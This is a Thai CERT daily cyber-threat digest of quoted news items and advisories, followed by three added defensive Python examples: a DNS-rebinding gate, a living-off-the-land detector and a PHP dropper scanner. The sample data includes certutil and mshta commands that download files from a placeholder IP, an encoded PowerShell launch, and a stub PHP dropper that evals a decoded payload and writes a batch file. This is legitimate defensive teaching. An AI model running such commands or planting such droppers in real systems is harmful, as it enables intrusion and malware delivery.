NCSA Webboard

    Cyber Threat Intelligence 02 July 2025

    Cyber Security News
    Posted by NCSA_THAICERT

      Energy Sector

      • Protecting The Core: Securing Protection Relays In Modern Substations
        "Substations are critical nexus points in the power grid, transforming high-voltage electricity to ensure its safe and efficient delivery from power plants to millions of end-users. At the core of a modern substation lies the protection relay: an intelligent electronic device (IED) that plays a critical role in maintaining the stability of the power grid by continuously monitoring voltage, current, frequency, and phase angle. Upon detecting a fault, it instantly isolates the affected zone by tripping circuit breakers, thus preventing equipment damage, fire hazards, and cascading power outages."
        https://cloud.google.com/blog/topics/threat-intelligence/securing-protection-relays-modern-substations

      Industrial Sector

      • FESTO Didactic CP, MPS 200, And MPS 400 Firmware
        "Successful exploitation of this vulnerability could allow an attacker to write arbitrary data and code to protected memory areas or read sensitive data to launch further attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-01
      • FESTO Automation Suite, FluidDraw, And Festo Didactic Products
        "Successful exploitation of these vulnerabilities could allow an attacker to gain full control of the host system, including remote code execution."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-02
      • FESTO CODESYS
        "Successful exploitation of these vulnerabilities could allow an attacker to block legitimate user connections, crash the application, or authenticate without proper credentials."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-03
      • FESTO Hardware Controller, Hardware Servo Press Kit
        "Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized system commands with root privileges."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-04
      • Voltronic Power And PowerShield UPS Monitoring Software
        "Successful exploitation of these vulnerabilities could allow an unauthenticated remote attacker to make configuration changes, resulting in shutting down UPS connected devices or execution of arbitrary code."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-05
      • Hitachi Energy Relion 670/650 And SAM600-IO Series
        "Successful exploitation of this vulnerability could allow attackers to cause a denial-of-service that disrupts critical functions in the device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-06
      • Hitachi Energy MSM
        "Successful exploitation of this vulnerability could allow attackers to execute untrusted code, potentially leading to unauthorized actions or system compromise."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-07

      Vulnerabilities

      • Critical RCE Vulnerability In Anthropic MCP Inspector - CVE-2025-49596
        "Oligo Security Research reported a Remote Code Execution (RCE) vulnerability and DNS rebinding in the MCP Inspector project to Anthropic, leading to CVE-2025-49596 being issued, with a Critical CVSS Score of 9.4. This is one of the first critical RCEs in Anthropic’s MCP ecosystem, exposing a new class of browser-based attacks against AI developer tools. With code execution on a developer’s machine, attackers can steal data, install backdoors, and move laterally across networks - highlighting serious risks for AI teams, open-source projects, and enterprise adopters relying on MCP. When a victim visits a malicious website, the vulnerability allows attackers to run arbitrary code on the visiting host running the official MCP inspector tool that is used by default in many use cases."
        https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596
        https://thehackernews.com/2025/07/critical-vulnerability-in-anthropics.html
      • Chrome Zero-Day, 'FoxyWallet' Firefox Attacks Threaten Browsers
        "Both the Google Chrome and Mozilla Firefox browsers currently are under separate attacks, the former from actors exploiting a zero-day bug and the latter from a list of malicious extensions that are actively compromising users. Google rushed out a stable channel update on Monday to patch the fourth zero-day flaw found in its browser this year, a high-severity type confusion flaw tracked as CVE-2025-6554, according to a Google security advisory. The flaw, which allows attackers to execute arbitrary code, is under active exploitation and should be patched immediately. Meanwhile, 45 malicious Firefox extensions impersonating legitimate cryptocurrency wallet add-ons are targeting Mozilla Firefox users, compromising their client devices."
        https://www.darkreading.com/cyberattacks-data-breaches/browsers-targeted-chrome-zero-day-malicious-firefox-extensions
        https://www.bleepingcomputer.com/news/security/google-fixes-fourth-actively-exploited-chrome-zero-day-of-2025/
        https://thehackernews.com/2025/07/google-patches-critical-zero-day-flaw.html
        https://www.securityweek.com/chrome-138-update-patches-zero-day-vulnerability/
        https://www.helpnetsecurity.com/2025/07/01/google-patches-actively-exploited-chrome-cve-2025-6554/
        https://www.infosecurity-magazine.com/news/google-patch-chrome-zero-day/
        https://www.malwarebytes.com/blog/news/2025/07/update-your-chrome-to-fix-new-actively-exploited-zero-day-vulnerability
      • CISA Adds Two Known Exploited Vulnerabilities To Catalog
        "CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-48927 TeleMessage TM SGNL Initialization of a Resource with an Insecure Default Vulnerability
        CVE-2025-48928 TeleMessage TM SGNL Exposure of Core Dump File to an Unauthorized Control Sphere Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/07/01/cisa-adds-two-known-exploited-vulnerabilities-catalog
      • Sudo Local Privilege Escalation Vulnerabilities Fixed (CVE-2025-32462, CVE-2025-32463)
        "If you haven’t recently updated the Sudo utility on your Linux box(es), you should do so now, to patch two local privilege escalation vulnerabilities (CVE-2025-32462, CVE-2025-32463) that were disclosed on Monday. Sudo is a command-line utility in Unix-like operating systems that allows a low-privilege user to execute a command as another user, typically the root/administrator user. The utility effectively grants temporary elevated privileges without requiring the user to log in as root."
        https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/
      • Can You Trust That Verified Symbol? Exploiting IDE Extensions Is Easier Than It Should Be
        "Integrated Development Environments (IDEs) play a major role in today’s programming landscape. They provide comprehensive environments in which programmers can write, test, and debug code efficiently. However, OX’s research, conducted in May and June 2025, reveals critical security vulnerabilities in how popular IDEs handle extension verification. IDEs typically include basic built-in functionality, but their capabilities extend through a wide range of third-party extensions available on marketplaces and external websites. This means that any risk in the IDE could result in far-reaching consequences."
        https://www.ox.security/can-you-trust-that-verified-symbol-exploiting-ide-extensions-is-easier-than-it-should-be/
        https://thehackernews.com/2025/07/new-flaw-in-ides-like-visual-studio.html

      Malware

      • How Analyzing 700,000 Security Incidents Helped Our Understanding Of Living Off The Land Tactics
        "This article shares initial findings from internal Bitdefender Labs research into Living off the Land (LOTL) techniques. Our team at Bitdefender Labs, comprised of hundreds of security researchers with close ties to academia, conducted this analysis as foundational research during the development of our GravityZone Proactive Hardening and Attack Surface Reduction (PHASR) technology. The results reveal adversaries’ persistent and widespread use of trusted system tools in most significant security incidents. While this research was primarily for our internal development efforts, we believe these initial insights from Bitdefender Labs are valuable for broader understanding and we are sharing them now, ahead of a more comprehensive report."
        https://www.helpnetsecurity.com/2025/07/01/bitdefender-lotl-security-incidents-phasr/
      • FileFix (Part 2)
        "While analyzing Chrome & MS Edge’s behavior, I made an interesting observation. When an HTML page is saved using Ctrl+S or Right-click > “Save as” and either “Webpage, Single File” or “Webpage, Complete” types were selected, then the file downloaded does not have MOTW. Furthermore, this behaviour only applies if the webpage being saved has a MIME type of text/html or application/xhtml+xml. Other MIME types will result in the file being tagged with MOTW (e.g. image/png, image/svg+xml etc.)"
        https://mrd0x.com/filefix-part-2/
        https://www.bleepingcomputer.com/news/security/new-filefix-attack-runs-jscript-while-bypassing-windows-motw-alerts/
      • Stealthy WordPress Malware Drops Windows Trojan Via PHP Backdoor
        "Last month, we encountered a particularly interesting and complex malware case that stood out from the usual infections we see in compromised WordPress websites. At first glance, the site looked clean, no visible signs of defacement, no malicious redirects, and nothing suspicious in the plugin list. But beneath the surface, a hidden infection chain was quietly working to deliver a trojan to unsuspecting visitors. It was a layered attack involving PHP-based droppers, obfuscated code, IP-based evasion, auto-generated batch scripts, and a malicious ZIP archive containing a Windows-based trojan (client32.exe)."
        https://blog.sucuri.net/2025/06/stealthy-wordpress-malware-drops-windows-trojan-via-php-backdoor.html

      Breaches/Hacks/Leaks

      • Kelly Benefits Says 2024 Data Breach Impacts 550,000 Customers
        "Kelly & Associates Insurance Group (dba Kelly Benefits) is informing more than half a million people of a data breach that compromised their personal information. The Maryland-based health and life insurance agency has issued an update on a security incident it suffered last year between December 12-17, when unauthorized actors breached its IT systems and stole files. On April 9, 2025, the company stated that the incident impacted 32,234 individuals. The figure was revised multiple times until the final tally shared with authorities in the U.S. counted 553,660 individuals."
        https://www.bleepingcomputer.com/news/security/kelly-benefits-says-2024-data-breach-impacts-550-000-customers/
      • Esse Health Says Recent Data Breach Affects Over 263,000 Patients
        "Esse Health, a healthcare provider based in St. Louis, Missouri, is notifying over 263,000 patients that their personal and health information was stolen in an April cyberattack. As the largest independent physicians' group in the Greater St. Louis area, Esse Health operates 50 locations and employs over 100 physicians. The organization was made aware of a breach after the attackers took down some primary patient-facing network systems and its phone systems on April 21."
        https://www.bleepingcomputer.com/news/security/esse-health-says-recent-data-breach-affects-over-263-000-patients/
        https://www.securityweek.com/263000-impacted-by-esse-health-data-breach/
        https://securityaffairs.com/179520/data-breach/esse-health-data-breach-impacted-263000-individuals.html
      • Qantas Discloses Cyberattack Amid Scattered Spider Aviation Breaches
        "Australian airline Qantas disclosed that it detected a cyberattack on Monday after threat actors gained access to a third-party platform containing customer data. Qantas is Australia's largest airline, operating domestic and international flights across six continents and employing around 24,000 people. In a press release issued Monday night, the airline states that the attack has been contained, but a "significant" amount of data is believed to have been stolen. The breach began after a threat actor targeted a Qantas call centre and gained access to a third-party customer servicing platform."
        https://www.bleepingcomputer.com/news/security/qantas-discloses-cyberattack-amid-scattered-spider-aviation-breaches/
        https://www.itnews.com.au/news/qantas-facing-significant-data-theft-after-cyber-attack-618367
        https://www.theregister.com/2025/07/02/qantas_data_theft/

      General News

      • How Cybercriminals Are Weaponizing AI And What CISOs Should Do About It
        "In a recent case tracked by Flashpoint, a finance worker at a global firm joined a video call that seemed normal. By the end of it, $25 million was gone. Everyone on the call except the employee was a deepfake. Criminals had used AI-powered cybercrime tactics to impersonate executives convincingly enough to get the payment approved. Threat actors are building LLMs specifically for fraud and cybercrime. These are trained on stolen credentials, scam scripts, and hacking guides. Some generate phishing emails or fake invoices, others explain how to use malware or cash out stolen data, according to the AI and Threat Intelligence report from Flashpoint."
        https://www.helpnetsecurity.com/2025/07/01/defending-ai-powered-cybercrime/
      • GenAI Is Everywhere, But Security Policies Haven’t Caught Up
        "Nearly three out of four European IT and cybersecurity professionals say staff are already using generative AI at work, up ten points in a year, but just under a third of organizations have put formal policies in place, according to new ISACA research. The use of AI is becoming more prevalent within the workplace, and so regulating its use is best practice. Yet 31% of organizations have a formal, comprehensive AI policy in place, highlighting a disparity between how often AI is used versus how closely it’s regulated in workplaces."
        https://www.helpnetsecurity.com/2025/07/01/ai-work-policies-europe/
      • Federal Reserve System CISO On Aligning Cyber Risk Management With Transparency, Trust
        "In this Help Net Security interview, Tammy Hornsby-Fink, CISO at Federal Reserve System, shares how the Fed approaches cyber risk with a scenario-based, intelligence-driven strategy. She explains how the Fed assesses potential disruptions to financial stability and addresses third-party and cloud service risks. Hornsby-Fink also discusses how federal collaboration supports managing systemic threats and strengthens operational resilience."
        https://www.helpnetsecurity.com/2025/07/01/tammy-hornsby-fink-federal-reserve-system-cyber-risk/
      • Scam Centers Are Spreading, And So Is The Human Cost
        "Human trafficking tied to online scam centers is spreading across the globe, according to a new crime trend update from INTERPOL. By March 2025, people from 66 countries had been trafficked into these scam operations, with every continent affected. INTERPOL found that 74% of victims were taken to scam centers in Southeast Asia, the original hotspot for this type of crime. But these centers are now also showing up in other regions, including the Middle East, West Africa, which may be turning into a new hub, and Central America. Most of the traffickers, around 90%, came from Asia. Another 11% were from South America or Africa."
        https://www.helpnetsecurity.com/2025/07/01/interpol-human-trafficking-scam-centers/
        https://www.infosecurity-magazine.com/news/scam-centers-global-footprint/
      • Terrible Tales Of Opsec Oversights: How Cybercrooks Get Themselves Caught
        "They say that success breeds complacency, and complacency leads to failure. For cybercriminals, taking too many shortcuts when it comes to opsec delivers a little more than that. In these cases, failure might mean the criminal doesn't get access to the server with the most valuable data to copy, or fails to trick any of the victim org's staff members to execute a malicious remote access tool. Complacency, however, can get them caught, and all too often we hear about highly skilled individuals taking one too many shortcuts – the type that leads police to their doors."
        https://www.theregister.com/2025/07/01/terrible_tales_of_opsec_oversights/
      • Treasury Sanctions Global Bulletproof Hosting Service Enabling Cybercriminals And Technology Theft
        "Today, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) is designating Aeza Group, a bulletproof hosting (BPH) services provider, for its role in supporting cybercriminal activity targeting victims in the United States and around the world. BPH service providers sell access to specialized servers and other computer infrastructure designed to help cybercriminals like ransomware actors, personal information stealers, and drug vendors evade detection and resist law enforcement attempts to disrupt their malicious activities. OFAC is also designating two affiliated companies and four individuals who are Aeza Group leaders. Finally, in coordination with the United Kingdom’s (UK) National Crime Agency (NCA), OFAC is designating an Aeza Group front company in the UK."
        https://home.treasury.gov/news/press-releases/sb0185
        https://www.bleepingcomputer.com/news/security/aeza-group-sanctioned-for-hosting-ransomware-infostealer-servers/
        https://therecord.media/russia-bulletproof-hosting-aeza-group-us-sanctions
        https://www.bankinfosecurity.com/us-sanctions-aeza-group-for-hosting-infostealers-ransomware-a-28871
        https://cyberscoop.com/bulletproof-hosting-provider-aezagroup-sanctions/
      • Top Ransomware Groups June 2025: Qilin Reclaims Top Spot
        "Qilin was the top ransomware group for the second time in three months in June, suggesting that the group may be strongly benefiting from the turmoil that knocked RansomHub offline at the beginning of April. RansomHub was the top ransomware group for more than a year until rival DragonForce claimed to be taking over its infrastructure in what may have been an act of sabotage. Qilin took over the top spot in April, and after SafePay narrowly took the lead in May, Qilin returned to the top in June with a dominant showing."
        https://cyble.com/blog/top-ransomware-groups-june-2025-qilin-top-spot/
      • Like SEO, LLMs May Soon Fall Prey To Phishing Scams
        "Just as attackers have exploited search engine optimization (SEO) techniques to push phishing content in search engine results, expect to soon see them leverage AI-optimized content to influence the outputs of large language models (LLMs) for the same purpose. Making the task possible for them is the tendency by LLMs to often return incorrect domain information in response to simple natural language queries, according to a recent experiment by Netcraft."
        https://www.darkreading.com/cyber-risk/seo-llms-fall-prey-phishing-scams
      • Ransomware Reshaped How Cyber Insurers Perform Security Assessments
        "The ransomware scourge has forced cyber insurers to re-examine how they use security assessments. While the threat has been around for years, it's only fairly recently that cybercriminals realized how profitable ransomware attacks could be. As ransomware-as-a-service and double extortion tactics started to emerge, the threat landscape has shifted immensely, with more and more organizations seeing their data splashed online for all to see, accompanied by payment countdown clocks. Cyber insurance helped organizations address the ransomware threat by providing services such as ransom reimbursement, incident response, and ransom negotiation. But that support came with a price, as policies and premiums fluctuated. In fact, insurance premiums surged in 2020 and 2021."
        https://www.darkreading.com/cybersecurity-operations/ransomware-reshaped-how-cyber-insurers-perform-security-assessments
      • We've All Been Wrong: Phishing Training Doesn't Work
        "A recent study suggests, contrary to popular belief, that most phishing awareness initiatives aren't having a material impact on employee cybersecurity. One of the most widely repeated, least examined memes in the cybersecurity industry is that, even more than technical solutions, organizations can best secure themselves by teaching cyber awareness among their employees. Building a "human firewall," to protect an organization's otherwise "weakest link.""
        https://www.darkreading.com/endpoint-security/phishing-training-doesnt-work
      • How Businesses Can Align Cyber Defenses With Real Threats
        "With escalating geopolitical tensions and highly publicized cyberattacks on critical infrastructure like Change Healthcare and Colonial Pipeline, businesses worldwide are grappling with increasingly sophisticated cybercriminal tactics. Cybercriminal groups are quickly adopting the highly complex tactics once limited to the most advanced state-backed operations. In parallel, heavily sanctioned nation-states are increasingly using ransomware and cryptocurrency scams through state backed threat actors to finance their regimes."
        https://www.darkreading.com/vulnerabilities-threats/how-businesses-can-align-cyber-defenses-real-threats
      • Crypto Hack Losses In First Half Of 2025 Exceed 2024 Total
        "Around $2.47bn in cryptocurrency has been stolen via scams, hacks and exploits in H1 2025, already exceeding the total amount lost during 2024, new data from CertiK has revealed. The surge in crypto losses in 2025 is largely the result of two major security incidents – the ByBit breach and Cetus Protocol incident. Collectively, these incidents cost $1.78bn, 72% of the total. In the ByBit incident, hackers stole $1.4bn in cryptocurrency from the Dubai-based exchange in February 2025. The notorious North Korean state actor Lazarus group is suspected of carrying out the Ethereum attack, which is the largest ever crypto theft to date."
        https://www.infosecurity-magazine.com/news/crypto-hack-losses-half-exceed-2024/
      • Cyberattack On Russian Independent Media Had Links To US-Sanctioned Institute, Researchers Find
        "A Russian hosting provider allegedly involved in a recent cyberattack against independent media organizations in the country is reportedly connected to a state-affiliated research center sanctioned by the U.S., according to new research. The hosting provider, Biterika, generated one-third of the junk traffic that flooded the websites of IStories and Verstka after they published an exposé on a child sex trafficking network in Russia that allegedly involved oligarchs and other powerful figures."
        https://therecord.media/cyberattack-on-russian-media-linked-to-sanctioned-institute
      • How To Build An Effective Security Awareness Program
        "Organizations invest in advanced tools to secure their assets, but humans are still the most persistent attack vector. Each year, this is reinforced by the overwhelming number of breaches that stem from human behaviour. Ultimately, employees are being asked to be hypervigilant all the time – despite their best efforts, everybody makes mistakes, and you can’t defend what you don’t know. By building a strong security awareness and training program, you can help your employees become your first line of defense against cyberattacks."
        https://www.trendmicro.com/en_us/research/25/f/security-awareness-program.html
      • Out-Of-Band, Part 1: The New Generation Of IP KVMs And How To Find Them
        "Welcome to the first post in Out-of-Band, a series exploring the security risks of out-of-band (OoB) management devices like baseboard management controllers, serial console servers, and IP-enabled KVMs. These tools often have weaker security than the systems they control, offering attackers a path to bypass monitoring and safeguards. In this installment, we focus on the latest wave of open-source, network-connected KVMs. We’ll cover where to find them in the wild, how to detect them via network and host signals (plus SIEM), and what their source code reveals about their security posture. Bonus: These devices have been used by North Korean threat actors to spoof in-country access. So if that’s a concern, read on."
        https://www.runzero.com/blog/oob-p1-ip-kvm/

      Reference: Electronic Transactions Development Agency (ETDA)
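Worked example for the MCP Inspector item (CVE-2025-49596) in the Vulnerabilities section above. The browser-based attack class described there works because a page served from attacker.example can make the victim's browser send requests to a tool listening on the victim's own loopback interface; after DNS rebinding the connection lands on 127.0.0.1, but the browser still puts the attacker's hostname in the Host header and the attacker's origin in Origin. A local developer tool can therefore refuse any request whose Host or Origin does not name the local machine. The code below is an added illustration of that gate in Python, written for this page; it is not code from MCP Inspector or from Oligo's report. The allow-list, port 8080 and the sample request headers are assumptions constructed for the example.

```python
"""Host/Origin allow-list gate for a developer tool bound to the loopback interface.

Added example: defence against DNS rebinding and cross-site requests from a
malicious web page. After rebinding, the browser connects to 127.0.0.1 but
still sends the attacker's hostname in Host (and its origin in Origin), so a
server that only answers requests naming the local machine is unreachable
from such a page. Allow-list, port and sample headers are assumptions.
"""
from typing import Dict, Optional
from urllib.parse import urlsplit

# Names under which the tool is legitimately reached. Assumed for the example.
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "[::1]"}


def _hostname(netloc: str) -> str:
    """Strip an optional port from a Host value or URL netloc; keep IPv6 brackets."""
    netloc = netloc.strip().lower()
    if netloc.startswith("["):                  # bracketed IPv6 literal, e.g. [::1]:8080
        end = netloc.find("]")
        return netloc[: end + 1] if end != -1 else netloc
    return netloc.rsplit(":", 1)[0] if ":" in netloc else netloc


def host_allowed(host_header: Optional[str]) -> bool:
    """True only if the Host header names the local machine.

    This check alone defeats DNS rebinding: the rebound page's requests carry
    the attacker's hostname in Host even though they arrive on 127.0.0.1.
    """
    if not host_header:
        return False
    return _hostname(host_header) in ALLOWED_HOSTS


def origin_allowed(origin_header: Optional[str], allow_missing: bool = False) -> bool:
    """True if the Origin header, when present, is a loopback origin.

    Browsers attach Origin to cross-origin fetches, POSTs and WebSocket
    handshakes; non-browser clients (curl, an IDE) send none, and allow_missing
    decides whether those are accepted.
    """
    if origin_header is None:
        return allow_missing
    if origin_header == "null":                 # serialised opaque origin (e.g. sandboxed iframe)
        return False
    parts = urlsplit(origin_header)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    return _hostname(parts.netloc) in ALLOWED_HOSTS


def request_allowed(headers: Dict[str, str], allow_missing_origin: bool = True) -> bool:
    """Combined gate a local HTTP/WebSocket server runs before routing a request."""
    lower = {k.lower(): v for k, v in headers.items()}
    return host_allowed(lower.get("host")) and origin_allowed(
        lower.get("origin"), allow_missing_origin
    )


if __name__ == "__main__":
    # Constructed requests: the developer's own browser tab versus a rebound attacker page.
    own_tab = {"Host": "localhost:8080", "Origin": "http://localhost:8080"}
    rebound = {"Host": "attacker.example:8080", "Origin": "http://attacker.example:8080"}
    print(request_allowed(own_tab), request_allowed(rebound))  # True False
```

In practice this gate belongs in front of every route, including the WebSocket upgrade, and sits beside binding the listener to 127.0.0.1 rather than 0.0.0.0 and requiring a per-session token; none of those substitutes for upgrading past the vulnerable version.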
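Worked example for the Bitdefender living-off-the-land item in the Malware section above: a small triage rule set run over process-creation events, flagging trusted, signed system binaries when they are launched with arguments or from parents that are characteristic of abuse (download cradles, encoded PowerShell, script hosts spawned by Office). This is an added example written for this page in Python, not Bitdefender's PHASR logic; the rules, weights, threshold and the five sample events are assumptions constructed here.

```python
"""Triage of living-off-the-land (LOTL) launches in process-creation events.

Added example, not Bitdefender's PHASR logic. Each rule pairs a signed Windows
binary with the argument or parent-process pattern that makes its use
suspicious; an event's score is the sum of matched rule weights. Rules,
weights, threshold and sample events are assumptions constructed here.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Event:
    pid: int
    image: str          # full path of the created process
    cmdline: str
    parent_image: str   # full path of the parent process


# (rule name, image regex, command-line regex, parent-image regex or None, weight)
RULES: List[Tuple[str, str, str, Optional[str], int]] = [
    ("certutil download/decode", r"certutil\.exe$", r"-urlcache|-decode", None, 3),
    ("rundll32 script/ordinal", r"rundll32\.exe$", r"javascript:|\.dll,#\d", None, 3),
    ("mshta remote/script", r"mshta\.exe$", r"https?://|vbscript:|javascript:", None, 3),
    ("regsvr32 scriptlet", r"regsvr32\.exe$", r"/i:https?://|scrobj\.dll", None, 3),
    ("bitsadmin transfer", r"bitsadmin\.exe$", r"/transfer", None, 2),
    ("encoded powershell", r"(powershell|pwsh)\.exe$",
     r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", None, 2),
    ("powershell download cradle", r"(powershell|pwsh)\.exe$",
     r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", None, 2),
    ("office spawns script host", r"(wscript|cscript|mshta|powershell|pwsh)\.exe$", r".*",
     r"(winword|excel|powerpnt|outlook)\.exe$", 3),
]


def match_rules(ev: Event) -> List[str]:
    """Names of every rule the event satisfies, in RULES order."""
    hits = []
    for name, image_re, cmd_re, parent_re, _weight in RULES:
        if not re.search(image_re, ev.image, re.I):
            continue
        if not re.search(cmd_re, ev.cmdline, re.I):
            continue
        if parent_re and not re.search(parent_re, ev.parent_image, re.I):
            continue
        hits.append(name)
    return hits


def score(ev: Event) -> int:
    """Sum of the weights of the rules the event matches."""
    weights = {name: w for name, _i, _c, _p, w in RULES}
    return sum(weights[n] for n in match_rules(ev))


def triage(events: List[Event], threshold: int = 3) -> Dict[int, List[str]]:
    """Events whose score reaches the threshold, keyed by pid, with the matched rule names."""
    return {ev.pid: match_rules(ev) for ev in events if score(ev) >= threshold}


# Constructed sample events (Sysmon-style fields); none are real telemetry.
SAMPLE_EVENTS = [
    Event(1001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
          r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    Event(1002, r"C:\Windows\System32\certutil.exe",
          "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\\Users\\Public\\a.txt",
          r"C:\Windows\System32\cmd.exe"),
    Event(1003, r"C:\Windows\System32\notepad.exe", "notepad.exe readme.txt",
          r"C:\Windows\explorer.exe"),
    Event(1004, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe Get-Process | Sort-Object CPU", r"C:\Windows\explorer.exe"),
    Event(1005, r"C:\Windows\System32\mshta.exe", "mshta.exe http://203.0.113.5/x.hta",
          r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS).items():
        print(pid, rules)
```

The point of the weighting is that the binary alone is never the signal: the PowerShell launched from Explorer in event 1004 scores zero, while the same binary spawned by Word with an encoded command line scores high enough to page an analyst.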
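Worked example for the Sucuri WordPress item in the Malware section above: a heuristic scanner that scores PHP source against indicators of the kind that write-up describes (eval of a decoded payload, gating on the visitor's IP address or user agent, writing batch or executable files for a Windows visitor). This is an added Python example written for this page, not Sucuri's tooling; the indicator patterns, weights, threshold, file paths and the three sample sources are constructed here and are not real files from a compromised site.

```python
"""Heuristic scan for obfuscated PHP droppers in a WordPress tree.

Added example, not Sucuri's tooling. A PHP source string is scored against
indicator patterns of the kind the write-up describes: eval of a decoded
payload, gating on the visitor's IP address or user agent, and writing
batch/executable files for a Windows victim. Patterns, weights, threshold,
paths and sample sources are assumptions constructed for this page.
"""
import re
from typing import Dict, List, Tuple

# (indicator name, regex, weight)
INDICATORS: List[Tuple[str, str, int]] = [
    ("eval of decoded payload",
     r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", 5),
    ("long base64 blob", r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]", 3),
    ("visitor IP gating",
     r"\$_SERVER\s*\[\s*['\"](REMOTE_ADDR|HTTP_X_FORWARDED_FOR)['\"]\s*\]", 2),
    ("user-agent gating", r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]", 1),
    ("drops windows payload", r"\.(bat|cmd|exe|zip)['\"]", 2),
    ("writes files from code", r"\b(file_put_contents|fwrite|move_uploaded_file)\s*\(", 1),
    ("remote fetch", r"\b(curl_exec\s*\(|file_get_contents\s*\(\s*['\"]https?://)", 2),
]


def scan_source(php: str) -> Dict[str, int]:
    """Indicator name -> weight for every indicator found in one PHP source."""
    return {name: w for name, pat, w in INDICATORS if re.search(pat, php, re.I)}


def risk_score(php: str) -> int:
    """Sum of the matched indicator weights."""
    return sum(scan_source(php).values())


def scan_tree(files: Dict[str, str], threshold: int = 5) -> List[Tuple[str, int, List[str]]]:
    """Files whose score reaches the threshold, highest first: (path, score, indicators).

    `files` maps path -> source text; a real run would read it from the web root.
    """
    ranked = []
    for path, src in files.items():
        hits = scan_source(src)
        total = sum(hits.values())
        if total >= threshold:
            ranked.append((path, total, sorted(hits)))
    return sorted(ranked, key=lambda item: -item[1])


# Constructed sample sources; none is a real file from a compromised site.
BENIGN = """<?php
// ordinary theme helper
function wpx_format_date($ts) { return date('Y-m-d', $ts); }
"""

CACHE_PLUGIN = """<?php
// a caching plugin legitimately reads the visitor IP and writes a file
$key = md5($_SERVER['REMOTE_ADDR'] . $_SERVER['REQUEST_URI']);
file_put_contents(WP_CONTENT_DIR . '/cache/' . $key . '.html', $html);
"""

DROPPER = (
    "<?php\n"
    "// dropper in the style the write-up describes: OS and IP checks, then a decoded payload\n"
    "if (strpos($_SERVER['HTTP_USER_AGENT'], 'Windows') === false) { exit; }\n"
    "if (in_array($_SERVER['REMOTE_ADDR'], $skip_list)) { exit; }\n"
    "$p = '" + "QUFB" * 60 + "';\n"
    "eval(gzinflate(base64_decode($p)));\n"
    "file_put_contents($dir . '/update.bat', \"start client32.exe\\r\\n\");\n"
)

SAMPLE_FILES = {
    "wp-content/themes/example/helper.php": BENIGN,
    "wp-content/plugins/example-cache/cache.php": CACHE_PLUGIN,
    "wp-content/uploads/tmp.php": DROPPER,
}

if __name__ == "__main__":
    for path, total, hits in scan_tree(SAMPLE_FILES):
        print(total, path, hits)
```

Individual indicators are weak on their own (the caching plugin sample legitimately reads REMOTE_ADDR and writes a file), which is why the scanner reports only files whose combined score crosses the threshold and lists the matched indicators so an analyst can confirm by reading the file.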
